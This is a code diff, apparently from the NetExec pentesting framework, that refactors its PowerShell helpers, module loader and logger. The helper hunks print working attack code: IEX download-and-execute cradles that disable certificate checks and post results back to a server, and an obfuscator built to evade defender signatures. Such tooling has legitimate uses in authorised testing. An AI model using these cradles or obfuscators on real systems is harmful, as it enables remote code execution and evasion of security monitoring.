# It prioritizes injecting into a process of the active console session
|
# It prioritizes injecting into a process of the active console session
|
||||||
ps_code = """
|
ps_code = """
|
||||||
|
@ -207,8 +252,22 @@ if (($injected -eq $False) -or ($inject_once -eq $False)){{
|
||||||
return ps_code
|
return ps_code
|
||||||
|
|
||||||
|
|
||||||
def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
|
def gen_ps_iex_cradle(context, scripts, command="", post_back=True):
|
||||||
if type(scripts) is str:
|
"""
|
||||||
|
Generates a PowerShell IEX cradle script for executing one or more scripts.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
context (Context): The context object containing server and port information.
|
||||||
|
scripts (str or list): The script(s) to be executed.
|
||||||
|
command (str, optional): A command to be executed after the scripts are executed. Defaults to an empty string.
|
||||||
|
post_back (bool, optional): Whether to send a POST request with the command. Defaults to True.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The generated PowerShell IEX cradle script.
|
||||||
|
"""
|
||||||
|
if isinstance(scripts, str):
|
||||||
launcher = """
|
launcher = """
|
||||||
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
|
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
|
||||||
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
|
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
|
||||||
|
@ -222,23 +281,18 @@ IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_scri
|
||||||
command=command if post_back is False else "",
|
command=command if post_back is False else "",
|
||||||
).strip()
|
).strip()
|
||||||
|
|
||||||
elif type(scripts) is list:
|
elif isinstance(scripts, list):
|
||||||
launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
|
launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
|
||||||
launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'"
|
launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'"
|
||||||
for script in scripts:
|
for script in scripts:
|
||||||
launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format(
|
launcher += f"IEX (New-Object Net.WebClient).DownloadString('{context.server}://{context.localip}:{context.server_port}/{script}')\n"
|
||||||
server=context.server,
|
|
||||||
port=context.server_port,
|
|
||||||
addr=context.localip,
|
|
||||||
script=script,
|
|
||||||
)
|
|
||||||
launcher.strip()
|
launcher.strip()
|
||||||
launcher += command if post_back is False else ""
|
launcher += command if post_back is False else ""
|
||||||
|
|
||||||
if post_back is True:
|
if post_back is True:
|
||||||
launcher += """
|
launcher += f"""
|
||||||
$cmd = {command}
|
$cmd = {command}
|
||||||
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/')
|
$request = [System.Net.WebRequest]::Create('{context.server}://{context.localip}:{context.server_port}/')
|
||||||
$request.Method = 'POST'
|
$request.Method = 'POST'
|
||||||
$request.ContentType = 'application/x-www-form-urlencoded'
|
$request.ContentType = 'application/x-www-form-urlencoded'
|
||||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
|
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
|
||||||
|
@ -246,12 +300,7 @@ $request.ContentLength = $bytes.Length
|
||||||
$requestStream = $request.GetRequestStream()
|
$requestStream = $request.GetRequestStream()
|
||||||
$requestStream.Write($bytes, 0, $bytes.Length)
|
$requestStream.Write($bytes, 0, $bytes.Length)
|
||||||
$requestStream.Close()
|
$requestStream.Close()
|
||||||
$request.GetResponse()""".format(
|
$request.GetResponse()"""
|
||||||
server=context.server,
|
|
||||||
port=context.server_port,
|
|
||||||
addr=context.localip,
|
|
||||||
command=command,
|
|
||||||
)
|
|
||||||
|
|
||||||
nxc_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
|
nxc_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
|
||||||
|
|
||||||
|
@ -260,30 +309,19 @@ $request.GetResponse()""".format(
|
||||||
|
|
||||||
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
|
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
|
||||||
def invoke_obfuscation(script_string):
|
def invoke_obfuscation(script_string):
|
||||||
# Add letters a-z with random case to $RandomDelimiters.
|
"""
|
||||||
alphabet = "".join(choice([i.upper(), i]) for i in ascii_lowercase)
|
Obfuscates a script string and generates an obfuscated payload for execution.
|
||||||
|
|
||||||
# Create list of random delimiters called random_delimiters.
|
Args:
|
||||||
# Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
|
----
|
||||||
random_delimiters = [
|
script_string (str): The script string to obfuscate.
|
||||||
"_",
|
|
||||||
"-",
|
|
||||||
",",
|
|
||||||
"{",
|
|
||||||
"}",
|
|
||||||
"~",
|
|
||||||
"!",
|
|
||||||
"@",
|
|
||||||
"%",
|
|
||||||
"&",
|
|
||||||
"<",
|
|
||||||
">",
|
|
||||||
";",
|
|
||||||
":",
|
|
||||||
]
|
|
||||||
|
|
||||||
for i in alphabet:
|
Returns:
|
||||||
random_delimiters.append(i)
|
-------
|
||||||
|
str: The obfuscated payload for execution.
|
||||||
|
"""
|
||||||
|
random_alphabet = "".join(random.choice([i.upper(), i]) for i in ascii_lowercase)
|
||||||
|
random_delimiters = ["_", "-", ",", "{", "}", "~", "!", "@", "%", "&", "<", ">", ";", ":", *list(random_alphabet)]
|
||||||
|
|
||||||
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
|
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
|
||||||
random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))]
|
random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))]
|
||||||
|
@ -356,7 +394,7 @@ def invoke_obfuscation(script_string):
|
||||||
set_ofs_var_back = "".join(choice([i.upper(), i.lower()]) for i in set_ofs_var_back)
|
set_ofs_var_back = "".join(choice([i.upper(), i.lower()]) for i in set_ofs_var_back)
|
||||||
|
|
||||||
# Generate the code that will decrypt and execute the payload and randomly select one.
|
# Generate the code that will decrypt and execute the payload and randomly select one.
|
||||||
baseScriptArray = [
|
base_script_array = [
|
||||||
"[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array,
|
"[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array,
|
||||||
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
||||||
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
|
||||||
|
@ -364,14 +402,14 @@ def invoke_obfuscation(script_string):
|
||||||
]
|
]
|
||||||
# Generate random JOIN syntax for all above options
|
# Generate random JOIN syntax for all above options
|
||||||
new_script_array = [
|
new_script_array = [
|
||||||
choice(baseScriptArray) + choice(["", " "]) + join + choice(["", " "]) + "''",
|
choice(base_script_array) + choice(["", " "]) + join + choice(["", " "]) + "''",
|
||||||
join + choice(["", " "]) + choice(baseScriptArray),
|
join + choice(["", " "]) + choice(base_script_array),
|
||||||
str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(baseScriptArray) + choice(["", " "]) + ")",
|
str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(base_script_array) + choice(["", " "]) + ")",
|
||||||
'"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(baseScriptArray) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"',
|
'"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(base_script_array) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"',
|
||||||
]
|
]
|
||||||
|
|
||||||
# Randomly select one of the above commands.
|
# Randomly select one of the above commands.
|
||||||
newScript = choice(new_script_array)
|
new_script = choice(new_script_array)
|
||||||
|
|
||||||
# Generate random invoke operation syntax
|
# Generate random invoke operation syntax
|
||||||
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1
|
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1
|
||||||
|
@ -383,54 +421,20 @@ def invoke_obfuscation(script_string):
|
||||||
# but not a silver bullet
|
# but not a silver bullet
|
||||||
# These methods draw on common environment variable values and PowerShell Automatic Variable
|
# These methods draw on common environment variable values and PowerShell Automatic Variable
|
||||||
# values/methods/members/properties/etc.
|
# values/methods/members/properties/etc.
|
||||||
invocationOperator = choice([".", "&"]) + choice(["", " "])
|
invocation_operator = choice([".", "&"]) + choice(["", " "])
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
|
invoke_expression_syntax.extend((invocation_operator + "( $ShellId[1]+$ShellId[13]+'x')", invocation_operator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')", invocation_operator + "( $env:Public[13]+$env:Public[5]+'x')", invocation_operator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')", invocation_operator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')", invocation_operator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')"))
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')")
|
|
||||||
invoke_expression_syntax.append(invocationOperator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')")
|
|
||||||
|
|
||||||
# Randomly choose from above invoke operation syntaxes.
|
# Randomly choose from above invoke operation syntaxes.
|
||||||
invokeExpression = choice(invoke_expression_syntax)
|
invoke_expression = choice(invoke_expression_syntax)
|
||||||
|
|
||||||
# Randomize the case of selected invoke operation.
|
# Randomize the case of selected invoke operation.
|
||||||
invokeExpression = "".join(choice([i.upper(), i.lower()]) for i in invokeExpression)
|
invoke_expression = "".join(choice([i.upper(), i.lower()]) for i in invoke_expression)
|
||||||
|
|
||||||
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
|
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
|
||||||
invokeOptions = [
|
invoke_options = [
|
||||||
choice(["", " "]) + invokeExpression + choice(["", " "]) + "(" + choice(["", " "]) + newScript + choice(["", " "]) + ")" + choice(["", " "]),
|
choice(["", " "]) + invoke_expression + choice(["", " "]) + "(" + choice(["", " "]) + new_script + choice(["", " "]) + ")" + choice(["", " "]),
|
||||||
choice(["", " "]) + newScript + choice(["", " "]) + "|" + choice(["", " "]) + invokeExpression,
|
choice(["", " "]) + new_script + choice(["", " "]) + "|" + choice(["", " "]) + invoke_expression,
|
||||||
]
|
]
|
||||||
|
|
||||||
obfuscated_payload = choice(invokeOptions)
|
return choice(invoke_options)
|
||||||
|
|
||||||
"""
|
|
||||||
# Array to store all selected PowerShell execution flags.
|
|
||||||
powerShellFlags = []
|
|
||||||
|
|
||||||
noProfile = '-nop'
|
|
||||||
nonInteractive = '-noni'
|
|
||||||
windowStyle = '-w'
|
|
||||||
|
|
||||||
# Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order.
|
|
||||||
# This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags.
|
|
||||||
commandlineOptions = []
|
|
||||||
commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)])
|
|
||||||
commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)])
|
|
||||||
# Randomly decide to write WindowStyle value with flag substring or integer value.
|
|
||||||
commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde'])))
|
|
||||||
|
|
||||||
# Randomize the case of all command-line arguments.
|
|
||||||
for count, option in enumerate(commandlineOptions):
|
|
||||||
commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option)
|
|
||||||
|
|
||||||
for count, option in enumerate(commandlineOptions):
|
|
||||||
commandlineOptions[count] = ''.join(option)
|
|
||||||
|
|
||||||
commandlineOptions = sample(commandlineOptions, len(commandlineOptions))
|
|
||||||
commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions)
|
|
||||||
|
|
||||||
obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript
|
|
||||||
"""
|
|
||||||
return obfuscated_payload
|
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import nxc
|
import nxc
|
||||||
import importlib
|
import importlib
|
||||||
import traceback
|
import traceback
|
||||||
|
@ -12,7 +9,7 @@ from os.path import join as path_join
|
||||||
|
|
||||||
from nxc.context import Context
|
from nxc.context import Context
|
||||||
from nxc.logger import NXCAdapter
|
from nxc.logger import NXCAdapter
|
||||||
from nxc.paths import nxc_PATH
|
from nxc.paths import NXC_PATH
|
||||||
|
|
||||||
|
|
||||||
class ModuleLoader:
|
class ModuleLoader:
|
||||||
|
@ -22,13 +19,14 @@ class ModuleLoader:
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
def module_is_sane(self, module, module_path):
|
def module_is_sane(self, module, module_path):
|
||||||
"""
|
"""Check if a module has the proper attributes"""
|
||||||
Check if a module has the proper attributes
|
|
||||||
"""
|
|
||||||
module_error = False
|
module_error = False
|
||||||
if not hasattr(module, "name"):
|
if not hasattr(module, "name"):
|
||||||
self.logger.fail(f"{module_path} missing the name variable")
|
self.logger.fail(f"{module_path} missing the name variable")
|
||||||
module_error = True
|
module_error = True
|
||||||
|
elif hasattr(module, "name") and module.name != module_path.split("/")[-1].split("\\")[-1][:-3]:
|
||||||
|
self.logger.fail(f"{module_path} filename must match the module name {module.name}")
|
||||||
|
module_error = True
|
||||||
elif not hasattr(module, "description"):
|
elif not hasattr(module, "description"):
|
||||||
self.logger.fail(f"{module_path} missing the description variable")
|
self.logger.fail(f"{module_path} missing the description variable")
|
||||||
module_error = True
|
module_error = True
|
||||||
|
@ -47,18 +45,13 @@ class ModuleLoader:
|
||||||
elif not hasattr(module, "on_login") and not (module, "on_admin_login"):
|
elif not hasattr(module, "on_login") and not (module, "on_admin_login"):
|
||||||
self.logger.fail(f"{module_path} missing the on_login/on_admin_login function(s)")
|
self.logger.fail(f"{module_path} missing the on_login/on_admin_login function(s)")
|
||||||
module_error = True
|
module_error = True
|
||||||
# elif not hasattr(module, 'chain_support'):
|
|
||||||
# self.logger.fail('{} missing the chain_support variable'.format(module_path))
|
|
||||||
# module_error = True
|
|
||||||
|
|
||||||
if module_error:
|
if module_error:
|
||||||
return False
|
return False
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def load_module(self, module_path):
|
def load_module(self, module_path):
|
||||||
"""
|
"""Load a module, initializing it and checking that it has the proper attributes"""
|
||||||
Load a module, initializing it and checking that it has the proper attributes
|
|
||||||
"""
|
|
||||||
try:
|
try:
|
||||||
spec = importlib.util.spec_from_file_location("NXCModule", module_path)
|
spec = importlib.util.spec_from_file_location("NXCModule", module_path)
|
||||||
module = spec.loader.load_module().NXCModule()
|
module = spec.loader.load_module().NXCModule()
|
||||||
|
@ -68,12 +61,9 @@ class ModuleLoader:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
||||||
self.logger.debug(traceback.format_exc())
|
self.logger.debug(traceback.format_exc())
|
||||||
return None
|
|
||||||
|
|
||||||
def init_module(self, module_path):
|
def init_module(self, module_path):
|
||||||
"""
|
"""Initialize a module for execution"""
|
||||||
Initialize a module for execution
|
|
||||||
"""
|
|
||||||
module = None
|
module = None
|
||||||
module = self.load_module(module_path)
|
module = self.load_module(module_path)
|
||||||
|
|
||||||
|
@ -99,9 +89,7 @@ class ModuleLoader:
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
def get_module_info(self, module_path):
|
def get_module_info(self, module_path):
|
||||||
"""
|
"""Get the path, description, and options from a module"""
|
||||||
Get the path, description, and options from a module
|
|
||||||
"""
|
|
||||||
try:
|
try:
|
||||||
spec = importlib.util.spec_from_file_location("NXCModule", module_path)
|
spec = importlib.util.spec_from_file_location("NXCModule", module_path)
|
||||||
module_spec = spec.loader.load_module().NXCModule
|
module_spec = spec.loader.load_module().NXCModule
|
||||||
|
@ -114,6 +102,7 @@ class ModuleLoader:
|
||||||
"supported_protocols": module_spec.supported_protocols,
|
"supported_protocols": module_spec.supported_protocols,
|
||||||
"opsec_safe": module_spec.opsec_safe,
|
"opsec_safe": module_spec.opsec_safe,
|
||||||
"multiple_hosts": module_spec.multiple_hosts,
|
"multiple_hosts": module_spec.multiple_hosts,
|
||||||
|
"requires_admin": bool(hasattr(module_spec, "on_admin_login") and callable(module_spec.on_admin_login)),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
if self.module_is_sane(module_spec, module_path):
|
if self.module_is_sane(module_spec, module_path):
|
||||||
|
@ -121,16 +110,13 @@ class ModuleLoader:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
||||||
self.logger.debug(traceback.format_exc())
|
self.logger.debug(traceback.format_exc())
|
||||||
return None
|
|
||||||
|
|
||||||
def list_modules(self):
|
def list_modules(self):
|
||||||
"""
|
"""List modules without initializing them"""
|
||||||
List modules without initializing them
|
|
||||||
"""
|
|
||||||
modules = {}
|
modules = {}
|
||||||
modules_paths = [
|
modules_paths = [
|
||||||
path_join(dirname(nxc.__file__), "modules"),
|
path_join(dirname(nxc.__file__), "modules"),
|
||||||
path_join(nxc_PATH, "modules"),
|
path_join(NXC_PATH, "modules"),
|
||||||
]
|
]
|
||||||
|
|
||||||
for path in modules_paths:
|
for path in modules_paths:
|
||||||
|
@ -140,6 +126,6 @@ class ModuleLoader:
|
||||||
module_path = path_join(path, module)
|
module_path = path_join(path, module)
|
||||||
module_data = self.get_module_info(module_path)
|
module_data = self.get_module_info(module_path)
|
||||||
modules.update(module_data)
|
modules.update(module_data)
|
||||||
except:
|
except Exception as e:
|
||||||
pass
|
self.logger.debug(f"Error loading module {module}: {e}")
|
||||||
return modules
|
return modules
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
from types import ModuleType
|
from types import ModuleType
|
||||||
from importlib.machinery import SourceFileLoader
|
from importlib.machinery import SourceFileLoader
|
||||||
from os import listdir
|
from os import listdir
|
||||||
|
|
|
@ -1,12 +1,9 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import logging
|
import logging
|
||||||
from logging import LogRecord
|
from logging import LogRecord
|
||||||
from logging.handlers import RotatingFileHandler
|
from logging.handlers import RotatingFileHandler
|
||||||
import os.path
|
import os.path
|
||||||
import sys
|
import sys
|
||||||
import re
|
import re
|
||||||
from nxc.helpers.misc import called_from_cmd_args
|
|
||||||
from nxc.console import nxc_console
|
from nxc.console import nxc_console
|
||||||
from termcolor import colored
|
from termcolor import colored
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
|
@ -34,39 +31,34 @@ class NXCAdapter(logging.LoggerAdapter):
|
||||||
logging.getLogger("pypykatz").disabled = True
|
logging.getLogger("pypykatz").disabled = True
|
||||||
logging.getLogger("minidump").disabled = True
|
logging.getLogger("minidump").disabled = True
|
||||||
logging.getLogger("lsassy").disabled = True
|
logging.getLogger("lsassy").disabled = True
|
||||||
#logging.getLogger("impacket").disabled = True
|
|
||||||
|
|
||||||
def format(self, msg, *args, **kwargs):
|
def format(self, msg, *args, **kwargs): # noqa: A003
|
||||||
"""
|
"""Format msg for output
|
||||||
Format msg for output if needed
|
|
||||||
This is used instead of process() since process() applies to _all_ messages, including debug calls
|
This is used instead of process() since process() applies to _all_ messages, including debug calls
|
||||||
"""
|
"""
|
||||||
if self.extra is None:
|
if self.extra is None:
|
||||||
return f"{msg}", kwargs
|
return f"{msg}", kwargs
|
||||||
|
|
||||||
if "module_name" in self.extra.keys():
|
if "module_name" in self.extra and len(self.extra["module_name"]) > 8:
|
||||||
if len(self.extra["module_name"]) > 8:
|
self.extra["module_name"] = self.extra["module_name"][:8] + "..."
|
||||||
self.extra["module_name"] = self.extra["module_name"][:8] + "..."
|
|
||||||
|
|
||||||
# If the logger is being called when hooking the 'options' module function
|
# If the logger is being called when hooking the 'options' module function
|
||||||
if len(self.extra) == 1 and ("module_name" in self.extra.keys()):
|
if len(self.extra) == 1 and ("module_name" in self.extra):
|
||||||
return (
|
return (
|
||||||
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
|
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
|
||||||
kwargs,
|
kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
# If the logger is being called from nxcServer
|
# If the logger is being called from nxcServer
|
||||||
if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()):
|
if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra):
|
||||||
return (
|
return (
|
||||||
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
|
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
|
||||||
kwargs,
|
kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
# If the logger is being called from a protocol
|
# If the logger is being called from a protocol
|
||||||
if "module_name" in self.extra.keys():
|
module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"])
|
||||||
module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"])
|
|
||||||
else:
|
|
||||||
module_name = colored(self.extra["protocol"], "blue", attrs=["bold"])
|
|
||||||
|
|
||||||
return (
|
return (
|
||||||
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
|
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
|
||||||
|
@ -74,68 +66,38 @@ class NXCAdapter(logging.LoggerAdapter):
|
||||||
)
|
)
|
||||||
|
|
||||||
def display(self, msg, *args, **kwargs):
|
def display(self, msg, *args, **kwargs):
|
||||||
"""
|
"""Display text to console, formatted for nxc"""
|
||||||
Display text to console, formatted for nxc
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
if "protocol" in self.extra.keys() and not called_from_cmd_args():
|
|
||||||
return
|
|
||||||
except AttributeError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
|
msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
|
||||||
text = Text.from_ansi(msg)
|
text = Text.from_ansi(msg)
|
||||||
nxc_console.print(text, *args, **kwargs)
|
nxc_console.print(text, *args, **kwargs)
|
||||||
self.log_console_to_file(text, *args, **kwargs)
|
self.log_console_to_file(text, *args, **kwargs)
|
||||||
|
|
||||||
def success(self, msg, color='green', *args, **kwargs):
|
def success(self, msg, color="green", *args, **kwargs):
|
||||||
"""
|
"""Print some sort of success to the user"""
|
||||||
Print some sort of success to the user
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
if "protocol" in self.extra.keys() and not called_from_cmd_args():
|
|
||||||
return
|
|
||||||
except AttributeError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
|
msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
|
||||||
text = Text.from_ansi(msg)
|
text = Text.from_ansi(msg)
|
||||||
nxc_console.print(text, *args, **kwargs)
|
nxc_console.print(text, *args, **kwargs)
|
||||||
self.log_console_to_file(text, *args, **kwargs)
|
self.log_console_to_file(text, *args, **kwargs)
|
||||||
|
|
||||||
def highlight(self, msg, *args, **kwargs):
|
def highlight(self, msg, *args, **kwargs):
|
||||||
"""
|
"""Prints a completely yellow highlighted message to the user"""
|
||||||
Prints a completely yellow highlighted message to the user
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
if "protocol" in self.extra.keys() and not called_from_cmd_args():
|
|
||||||
return
|
|
||||||
except AttributeError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
|
msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
|
||||||
text = Text.from_ansi(msg)
|
text = Text.from_ansi(msg)
|
||||||
nxc_console.print(text, *args, **kwargs)
|
nxc_console.print(text, *args, **kwargs)
|
||||||
self.log_console_to_file(text, *args, **kwargs)
|
self.log_console_to_file(text, *args, **kwargs)
|
||||||
|
|
||||||
def fail(self, msg, color='red', *args, **kwargs):
|
def fail(self, msg, color="red", *args, **kwargs):
|
||||||
"""
|
"""Prints a failure (may or may not be an error) - e.g. login creds didn't work"""
|
||||||
Prints a failure (may or may not be an error) - e.g. login creds didn't work
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
if "protocol" in self.extra.keys() and not called_from_cmd_args():
|
|
||||||
return
|
|
||||||
except AttributeError:
|
|
||||||
pass
|
|
||||||
msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
|
msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
|
||||||
text = Text.from_ansi(msg)
|
text = Text.from_ansi(msg)
|
||||||
nxc_console.print(text, *args, **kwargs)
|
nxc_console.print(text, *args, **kwargs)
|
||||||
self.log_console_to_file(text, *args, **kwargs)
|
self.log_console_to_file(text, *args, **kwargs)
|
||||||
|
|
||||||
def log_console_to_file(self, text, *args, **kwargs):
|
def log_console_to_file(self, text, *args, **kwargs):
|
||||||
"""
|
"""Log the console output to a file
|
||||||
|
|
||||||
If debug or info logging is not enabled, we still want display/success/fail logged to the file specified,
|
If debug or info logging is not enabled, we still want display/success/fail logged to the file specified,
|
||||||
so we create a custom LogRecord and pass it to all the additional handlers (which will be all the file handlers
|
so we create a custom LogRecord and pass it to all the additional handlers (which will be all the file handlers)
|
||||||
"""
|
"""
|
||||||
if self.logger.getEffectiveLevel() >= logging.INFO:
|
if self.logger.getEffectiveLevel() >= logging.INFO:
|
||||||
# will be 0 if it's just the console output, so only do this if we actually have file loggers
|
# will be 0 if it's just the console output, so only do this if we actually have file loggers
|
||||||
|
@ -164,16 +126,16 @@ class NXCAdapter(logging.LoggerAdapter):
|
||||||
file_creation = False
|
file_creation = False
|
||||||
|
|
||||||
if not os.path.isfile(output_file):
|
if not os.path.isfile(output_file):
|
||||||
